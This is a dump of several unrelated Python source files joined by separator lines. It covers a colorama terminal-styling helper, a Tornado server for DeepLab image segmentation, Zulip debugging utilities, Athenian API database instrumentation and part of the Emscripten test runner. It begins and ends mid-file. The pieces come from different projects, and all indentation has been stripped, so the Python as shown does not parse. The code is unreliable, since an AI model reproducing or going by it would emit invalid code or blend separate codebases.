agent_step=self.agent_weights_id)
self.ps.session.op_check_weights()
self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=sum(rewards),
reward_weight=experience_size)
|
quack.py
|
#!/usr/bin/python3
import os
import sys
import time
import json
from pprint import pprint
from threading import Thread
from colorama import Fore, Back, Style
RESET_CHARS = Fore.RESET + Back.RESET + Style.RESET_ALL
PATH = os.path.dirname(os.path.realpath(__file__))
SPINNER_JSON = os.path.join(PATH, "data", "spinners.json")
SPINNERS = json.load(open(SPINNER_JSON))
STYLES_JSON = os.path.join(PATH, "data", "styles.json")
STYLES = json.load(open(STYLES_JSON))
STYLE_FIELDS = {
"background": "Back",
"foreground": "Fore",
"style": "Style"
}
def spin(spinner: str, fn, *args):
timer = 0
idx = 0
frames = SPINNERS[spinner]["frames"]
interval = SPINNERS[spinner]["interval"]
action = Thread(target=fn, args=args)
action.start()
while action.is_alive():
timer += (interval / 1000)
sys.stdout.write(
f"[{str(timer).split('.')[0]}s][ {frames[idx]} ]\r"
)
sys.stdout.flush()
time.sleep(interval / 1000)
if idx == len(frames) - 1:
idx = 0
else:
idx += 1
def ask(prompt: str, style: str):
chars = __get_style_chars(style)
if chars:
answer = input(''.join(chars) + prompt + RESET_CHARS)
def talk(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
print(''.join(chars) + msg + RESET_CHARS)
def eloquate(data: dict, style: str):
chars = __get_style_chars(style)
if chars:
sys.stdout.write(''.join(chars))
pprint(data, indent=2)
sys.stdout.write(RESET_CHARS)
sys.stdout.flush()
def title(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
print(__wrap(msg, "="))
def subtitle(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
print(__wrap(msg, "-"))
def list_styles():
for s in STYLES.keys():
print(s)
def __get_style_chars(style: str):
s = __get_style(style)
chars = []
if s:
for key in s.keys():
if key in STYLE_FIELDS:
chars.append(__get_char(STYLE_FIELDS[key], s[key]))
return chars
def __get_style(style):
s = STYLES.get(style, None)
if s:
return s
else:
raise Exception("Style did not exist in styles.json.")
def __get_char(category: str, choice: str):
try:
char = getattr(globals()[category], choice)
return char
except AttributeError as e:
print("Color or Style unavailable in colorama.")
raise e
def __wrap(msg: str, s: str):
d = s * len(msg)
return f"{d}\n{msg}\n{d}"
|
run.py
|
from __future__ import print_function
import os, sys, signal
# adding import path for the directory above this sctip (for deeplab modules)
myPath = os.path.dirname(sys.argv[0])
rootPath = os.path.join(myPath,'..')
uploadPath = os.path.join(rootPath, "upload")
resultsPath = os.path.join(rootPath, "results")
weightsModelPath = os.path.join(rootPath, "deeplab_resnet.ckpt")
sys.path.append(rootPath)
import tornado.httpserver, tornado.ioloop, tornado.options, tornado.web, os.path, random, string
import uuid
from tornado.options import define, options
from Queue import Queue
from threading import Thread
from datetime import datetime
import time
import datetime
from PIL import Image
import tensorflow as tf
import numpy as np
from deeplab_resnet import DeepLabResNetModel, ImageReader, decode_labels, dense_crf, prepare_label
SAVE_DIR = './output/'
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
GPU=1
###
port = 8888
ipaddress = "131.179.142.7"
hostUrl = "http://"+ipaddress+":"+str(port)
define("port", default=port, help="run on the given port", type=int)
quit = False
requestQueue = Queue()
def timestampMs():
return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
(r"/upload", UploadHandler),
(r"/result/(.*)", tornado.web.StaticFileHandler, {"path" : "./results"}),
(r"/status", StatusHandler)
]
tornado.web.Application.__init__(self, handlers)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("upload_form.html")
class UploadHandler(tornado.web.RequestHandler):
def post(self):
print("New upload request "+str(self.request))
if requestQueue.qsize() > 0:
print("Pending request in progress... REPLY 423")
self.set_status(423)
self.finish("service is not available. try again later")
return
fileData = self.request.files['file'][0]
original_fname = fileData['filename']
extension = os.path.splitext(original_fname)[1]
fileID = str(uuid.uuid4())
fname = os.path.join(uploadPath, fileID)
imageFile = open(fname, 'w')
imageFile.write(fileData['body'])
requestQueue.put(fileID)
print("Submitted request " + fileID + " for segmentation processing");
self.finish(hostUrl+"/result/"+fileID+".png")
class StatusHandler(tornado.web.RequestHandler):
def get(self):
self.finish("ok")
### DEEPLAB STUFF BELOW
def load(saver, sess, ckpt_path):
'''Load trained weights.
Args:
saver: TensorFlow saver object.
sess: TensorFlow session.
ckpt_path: path to checkpoint file with parameters.
'''
saver.restore(sess, ckpt_path)
print("Restored model parameters from {}".format(ckpt_path))
def deeplabProcessing(gpuId):
"""Create the model and start the evaluation process."""
print("Starting worker on GPU "+str(gpuId) + "...")
def printWorker(msg):
print(str(timestampMs())+" [gpu-worker-"+ str(gpuId)+"] " + msg)
printWorker("Waiting for segmentation requests...")
initialized = False
while (not quit):
fileId = requestQueue.get() # will block
if fileId == "quit"+str(gpuId):
printWorker("Received quit command")
break
printWorker("Received request for DL segmentaiton: "+fileId)
printWorker("Requests queue size: " + str( requestQueue.qsize()))
t1 = timestampMs() #datetime.datetime.now()
imgPath = os.path.join(uploadPath, fileId)
# Prepare image.
imgRGB = tf.image.decode_jpeg(tf.read_file(imgPath), channels=3)
# Convert RGB to BGR.
img_r, img_g, img_b = tf.split(imgRGB, 3, axis=2)
imgBGR = tf.cast(tf.concat([img_b, img_g, img_r], 2), dtype=tf.float32)
# Extract mean.
imgBGR -= IMG_MEAN
printWorker("Will create network")
# Create network.
net = DeepLabResNetModel({'data': tf.expand_dims(imgBGR, dim=0)}, is_training=False)
tf.get_variable_scope().reuse_variables()
printWorker("Network created")
# Which variables to load.
restore_var = tf.global_variables()
# Predictions.
raw_output = net.layers['fc1_voc12']
raw_output_up = tf.image.resize_bilinear(raw_output, tf.shape(imgBGR)[0:2,])
printWorker("Predictions")
# CRF.
raw_output_up = tf.nn.softmax(raw_output_up)
raw_output_up = tf.py_func(dense_crf, [raw_output_up, tf.expand_dims(imgRGB, dim=0)], tf.float32)
printWorker("CRF")
raw_output_up = tf.argmax(raw_output_up, dimension=3)
pred = tf.expand_dims(raw_output_up, dim=3)
if not initialized:
printWorker("Setup tf session")
# Set up TF session and initialize variables.
config = tf.ConfigProto(device_count = {'GPU': gpuId})
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
init = tf.global_variables_initializer()
sess.run(init)
printWorker("TF session initialized")
# Load weights.
loader = tf.train.Saver(var_list=restore_var)
load(loader, sess, weightsModelPath)
initialized = True
# Perform inference.
preds = sess.run(pred)
msk = decode_labels(preds)
im = Image.fromarray(msk[0])
maskPath = os.path.join(resultsPath, fileId)+".png"
im.save(maskPath)
originalFile = os.path.join(uploadPath,fileId)
os.remove(originalFile)
t2 = timestampMs() #datetime.datetime.now()
printWorker("Processing took "+str(t2-t1)+"ms. Result is at "+maskPath)
def signal_handler(signum, frame):
global is_closing
print('Received stop signal, exiting...')
tornado.ioloop.IOLoop.instance().stop()
quit = True
def main():
signal.signal(signal.SIGINT, signal_handler)
# TODO: this can be expanded to utilize more than one GPU
nGpus = 1
workers = []
for i in range(0,nGpus):
worker = Thread(target=deeplabProcessing, args=(i,))
worker.start()
workers.append(worker)
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
print("Will terminate GPU workers...")
for i in range(0,len(workers)):
requestQueue.put("quit"+str(i))
if __name__ == "__main__":
main()
|
debug.py
|
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
"""Interrupt running process, and provide a python prompt for
interactive debugging."""
d = {'_frame': frame} # Allow access to frame object.
d.update(frame.f_globals) # Unless shadowed by global
d.update(frame.f_locals)
message = "Signal received : entering python shell.\nTraceback:\n"
message += ''.join(traceback.format_stack(frame))
i = code.InteractiveConsole(d)
i.interact(message)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
signal.signal(signal.SIGUSR1, lambda sig, stack: traceback.print_stack(stack))
signal.signal(signal.SIGUSR2, interactive_debug)
def tracemalloc_dump() -> None:
if not tracemalloc.is_tracing():
logger.warning("pid {}: tracemalloc off, nothing to dump"
.format(os.getpid()))
return
# Despite our name for it, `timezone_now` always deals in UTC.
basename = "snap.{}.{}".format(os.getpid(),
timezone_now().strftime("%F-%T"))
path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
gc.collect()
tracemalloc.take_snapshot().dump(path)
with open('/proc/{}/stat'.format(os.getpid()), 'rb') as f:
procstat = f.read().split()
rss_pages = int(procstat[23])
logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
.format(tracemalloc.get_traced_memory()[0] // 1048576,
tracemalloc.get_traced_memory()[1] // 1048576,
tracemalloc.get_tracemalloc_memory() // 1048576,
rss_pages // 256,
basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
while True:
sock.recv(1)
tracemalloc_dump()
listener_pid = None # type: Optional[int]
def tracemalloc_listen() -> None:
global listener_pid
if listener_pid == os.getpid():
# Already set up -- and in this process, not just its parent.
return
logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
listener_pid = os.getpid()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
path = "/tmp/tracemalloc.{}".format(os.getpid())
sock.bind(path)
thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
daemon=True)
thread.start()
logger.debug('pid {}: tracemalloc_listen done: {}'.format(
os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
'''If tracemalloc tracing enabled, listen for requests to dump a snapshot.
To trigger once this is listening:
echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid
To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
This function is called in middleware, so the process will
automatically start listening.
To enable in other contexts: see upstream docs
https://docs.python.org/3/library/tracemalloc .
You may also have to add a call to this function somewhere.
'''
if os.environ.get('PYTHONTRACEMALLOC'):
# If the server was started with `tracemalloc` tracing on, then
# listen for a signal to dump `tracemalloc` snapshots.
tracemalloc_listen()
|
db.py
|
import asyncio
from contextvars import ContextVar
import logging
import os
import pickle
import re
import sqlite3
import sys
import threading
import time
from typing import Any, Callable, List, Mapping, Optional, Union
from urllib.parse import quote
import aiohttp.web
import aiosqlite
import asyncpg
import morcilla.core
from morcilla.interfaces import ConnectionBackend, TransactionBackend
import numpy as np
import sentry_sdk
from sqlalchemy import insert
from sqlalchemy.dialects.postgresql import insert as postgres_insert
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql import CompoundSelect, Select
from sqlalchemy.sql.functions import ReturnTypeFromArgs
from athenian.api import metadata
from athenian.api.models import check_alembic_schema_version, check_collation, \
DBSchemaMismatchError
from athenian.api.models.metadata import check_schema_version as check_mdb_schema_version
from athenian.api.slogging import log_multipart
from athenian.api.typing_utils import wraps
def add_pdb_metrics_context(app: aiohttp.web.Application) -> dict:
"""Create and attach the precomputed DB metrics context."""
ctx = app["pdb_context"] = {
"hits": ContextVar("pdb_hits", default=None),
"misses": ContextVar("pdb_misses", default=None),
}
return ctx
pdb_metrics_logger = logging.getLogger("%s.pdb" % metadata.__package__)
def set_pdb_hits(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Assign the `topic` precomputed DB hits to `value`."""
pdb.metrics["hits"].get()[topic] = value
pdb_metrics_logger.info("hits/%s: %d", topic, value, stacklevel=2)
def set_pdb_misses(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Assign the `topic` precomputed DB misses to `value`."""
pdb.metrics["misses"].get()[topic] = value
pdb_metrics_logger.info("misses/%s: %d", topic, value, stacklevel=2)
def add_pdb_hits(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Increase the `topic` precomputed hits by `value`."""
if value < 0:
pdb_metrics_logger.error('negative add_pdb_hits("%s", %d)', topic, value)
pdb.metrics["hits"].get()[topic] += value
pdb_metrics_logger.info("hits/%s: +%d", topic, value, stacklevel=2)
def add_pdb_misses(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Increase the `topic` precomputed misses by `value`."""
if value < 0:
pdb_metrics_logger.error('negative add_pdb_misses("%s", %d)', topic, value)
pdb.metrics["misses"].get()[topic] += value
pdb_metrics_logger.info("misses/%s: +%d", topic, value, stacklevel=2)
Connection = morcilla.Connection
Database = morcilla.Database
_sql_log = logging.getLogger("%s.sql" % metadata.__package__)
_testing = "pytest" in sys.modules or os.getenv("SENTRY_ENV", "development") == "development"
_sql_str_re = re.compile(r"'[^']+'(, )?")
_log_sql_re = re.compile(r"SELECT|\(SELECT|WITH RECURSIVE")
def _generate_tags() -> str:
with sentry_sdk.configure_scope() as scope:
if (transaction := scope.transaction) is None:
return ""
values = [
f"application='{metadata.__package__}'",
f"framework='{metadata.__version__}'",
f"route='{quote(transaction.name)}'",
f"traceparent='{transaction.trace_id}'",
f"tracestate='{scope.span.span_id}'",
]
try:
values.append(f"controller='{scope._tags['account']}'")
except KeyError:
pass
values.append(
f"action='{';'.join(k for k, v in scope._tags.items() if isinstance(v, bool))}'")
return " /*" + ",".join(sorted(values)) + "*/"
async def _asyncpg_execute(self,
query: str,
args,
limit,
timeout,
**kwargs):
description = query = query.strip()
if query.startswith("/*"):
log_sql_probe = query[query.find("*/", 2, 1024) + 3:]
else:
log_sql_probe = query
if _log_sql_re.match(log_sql_probe) and not _testing:
from athenian.api.tracing import MAX_SENTRY_STRING_LENGTH
if len(description) <= MAX_SENTRY_STRING_LENGTH and args:
description += " | " + str(args)
if len(description) > MAX_SENTRY_STRING_LENGTH:
transaction = sentry_sdk.Hub.current.scope.transaction
if transaction is not None and transaction.sampled:
query_id = log_multipart(_sql_log, pickle.dumps((query, args)))
brief = _sql_str_re.sub("", query)
description = "%s\n%s" % (query_id, brief[:MAX_SENTRY_STRING_LENGTH])
with sentry_sdk.start_span(op="sql", description=description) as span:
if not _testing:
query += _generate_tags()
result = await self._execute_original(query, args, limit, timeout, **kwargs)
try:
span.description = "=> %d\n%s" % (len(result[0]), span.description)
except TypeError:
pass
return result
async def _asyncpg_executemany(self, query, args, timeout, **kwargs):
with sentry_sdk.start_span(op="sql", description="<= %d\n%s" % (len(args), query)):
return await self._executemany_original(query, args, timeout, **kwargs)
asyncpg.Connection._execute_original = asyncpg.Connection._Connection__execute
asyncpg.Connection._Connection__execute = _asyncpg_execute
asyncpg.Connection._executemany_original = asyncpg.Connection._executemany
asyncpg.Connection._executemany = _asyncpg_executemany
class greatest(ReturnTypeFromArgs): # noqa
"""SQL GREATEST function."""
class least(ReturnTypeFromArgs): # noqa
"""SQL LEAST function."""
db_retry_intervals = [0, 0.1, 0.5, 1.4, None]
def measure_db_overhead_and_retry(db: Union[morcilla.Database, Database],
db_id: Optional[str] = None,
app: Optional[aiohttp.web.Application] = None,
) -> Union[morcilla.Database, Database]:
"""
Instrument Database to measure the time spent inside DB i/o.
Also retry queries after connectivity errors.
"""
log = logging.getLogger("%s.measure_db_overhead_and_retry" % metadata.__package__)
backend_connection = db._backend.connection # type: Callable[[], ConnectionBackend]
def wrapped_backend_connection() -> ConnectionBackend:
connection = backend_connection()
connection._retry_lock = asyncio.Lock()
def measure_method_overhead_and_retry(func) -> callable:
async def wrapped_measure_method_overhead_and_retry(*args, **kwargs):
start_time = time.time()
wait_intervals = []
raw_connection = None
try:
raw_connection = connection.raw_connection
if (
(isinstance(raw_connection, asyncpg.Connection) and
raw_connection.is_in_transaction())
or
(isinstance(raw_connection, aiosqlite.Connection) and
raw_connection.in_transaction)
):
# it is pointless to retry, the transaction has already failed
wait_intervals = [None]
except AssertionError:
pass # Connection is not acquired
if not wait_intervals:
wait_intervals = db_retry_intervals
async def execute():
need_acquire = False
for i, wait_time in enumerate(wait_intervals):
try:
if need_acquire:
await connection.acquire()
return await func(*args, **kwargs)
except (OSError,
asyncpg.PostgresConnectionError,
asyncpg.OperatorInterventionError,
asyncpg.InsufficientResourcesError,
sqlite3.OperationalError) as e:
if wait_time is None:
raise e from None
log.warning("[%d] %s: %s", i + 1, type(e).__name__, e)
if need_acquire := isinstance(e, asyncpg.PostgresConnectionError):
try:
await connection.release()
except Exception as e:
log.warning("connection.release() raised %s: %s",
type(e).__name__, e)
await asyncio.sleep(wait_time)
finally:
if app is not None:
elapsed = app["db_elapsed"].get()
if elapsed is None:
log.warning("Cannot record the %s overhead", db_id)
else:
delta = time.time() - start_time
elapsed[db_id] += delta
if db.url.dialect == "sqlite":
return await execute()
async with connection._retry_lock:
return await execute()
return wraps(wrapped_measure_method_overhead_and_retry, func)
connection.acquire = measure_method_overhead_and_retry(connection.acquire)
connection.fetch_all = measure_method_overhead_and_retry(connection.fetch_all)
connection.fetch_one = measure_method_overhead_and_retry(connection.fetch_one)
connection.execute = measure_method_overhead_and_retry(connection.execute)
connection.execute_many = measure_method_overhead_and_retry(connection.execute_many)
original_transaction = connection.transaction
def transaction() -> TransactionBackend:
t = original_transaction()
t.start = measure_method_overhead_and_retry(t.start)
t.commit = measure_method_overhead_and_retry(t.commit)
t.rollback = measure_method_overhead_and_retry(t.rollback)
return t
connection.transaction = transaction
return connection
db._backend.connection = wrapped_backend_connection
return db
def check_schema_versions(metadata_db: str,
state_db: str,
precomputed_db: str,
persistentdata_db: str,
log: logging.Logger,
) -> bool:
"""Validate schema versions in parallel threads."""
passed = True
logging.getLogger("alembic.runtime.migration").setLevel(logging.WARNING)
def check_alembic(name, cs):
nonlocal passed
try:
check_alembic_schema_version(name, cs, log)
check_collation(cs)
except DBSchemaMismatchError as e:
passed = False
log.error("%s schema version check failed: %s", name, e)
except Exception:
passed = False
log.exception("while checking %s", name)
def check_metadata(cs):
nonlocal passed
try:
check_mdb_schema_version(cs, log)
check_collation(cs)
except DBSchemaMismatchError as e:
passed = False
log.error("metadata schema version check failed: %s", e)
except Exception:
passed = False
log.exception("while checking metadata")
checkers = [threading.Thread(target=check_alembic, args=args)
for args in (("state", state_db),
("precomputed", precomputed_db),
("persistentdata", persistentdata_db),
)]
checkers.append(threading.Thread(target=check_metadata, args=(metadata_db,)))
for t in checkers:
t.start()
for t in checkers:
t.join()
return passed
DatabaseLike = Union[Database, Connection]
# https://stackoverflow.com/questions/49456158/integer-in-python-pandas-becomes-blob-binary-in-sqlite # noqa
for dtype in (np.uint32, np.int32, np.uint64, np.int64):
sqlite3.register_adapter(dtype, lambda val: int(val))
def _with_statement_hint(self, text, dialect_name="*"):
self._statement_hints += ((dialect_name, text),)
return self
CompoundSelect._statement_hints = ()
CompoundSelect.with_statement_hint = _with_statement_hint
@compiles(Select)
@compiles(CompoundSelect)
def _visit_select(element, compiler, **kw):
"""Prepend pg_hint_plan hints."""
per_dialect = [
ht
for (dialect_name, ht) in element._statement_hints
if dialect_name in ("*", compiler.dialect.name)
]
if per_dialect:
hints = "/*+\n %s\n */\n" % "\n ".join(per_dialect)
statement_hints = element._statement_hints
element._statement_hints = ()
else:
hints = ""
statement_hints = ()
try:
text = getattr(compiler, f"visit_{element.__visit_name__}")(element, **kw)
finally:
element._statement_hints = statement_hints
if hints:
return hints + text
return text
async def insert_or_ignore(model,
values: List[Mapping[str, Any]],
caller: str,
db: Database) -> None:
"""Insert records to the table corresponding to the `model`. Ignore PK collisions."""
if db.url.dialect == "postgresql":
sql = postgres_insert(model).on_conflict_do_nothing()
elif db.url.dialect == "sqlite":
sql = insert(model).prefix_with("OR IGNORE")
else:
raise AssertionError(f"Unsupported database dialect: {db.url.dialect}")
with sentry_sdk.start_span(op=f"{caller}/execute_many"):
if db.url.dialect == "sqlite":
async with db.connection() as pdb_conn:
async with pdb_conn.transaction():
await pdb_conn.execute_many(sql, values)
else:
await db.execute_many(sql, values)
def extract_registered_models(base: Any) -> Mapping[str, Any]:
"""Return the mapping from declarative model names to their classes."""
try:
# 1.3
return base._decl_class_registry
except AttributeError:
# 1.4+
return base.registry._class_registry
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
tests/runner asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from enum import Enum
from functools import wraps
from subprocess import PIPE, STDOUT
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import stat
import sys
import tempfile
import time
import unittest
import webbrowser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete
from tools.utils import MACOS, WINDOWS
from tools import shared, line_endings, building, config
def path_from_root(*pathelems):
"""Construct a path relative to the emscripten root directory."""
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger("runner")
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0')) or shared.DEBUG
TEST_ROOT = path_from_root('tests')
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return os.path.join(TEST_ROOT, *path_components)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dylink()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
def decorated(self):
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
f(self)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
def make_executable(name):
os.chmod(name, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict',
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
'asan',
'lsan',
'wasm2ss',
'posixtest',
'posixtest_browser',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
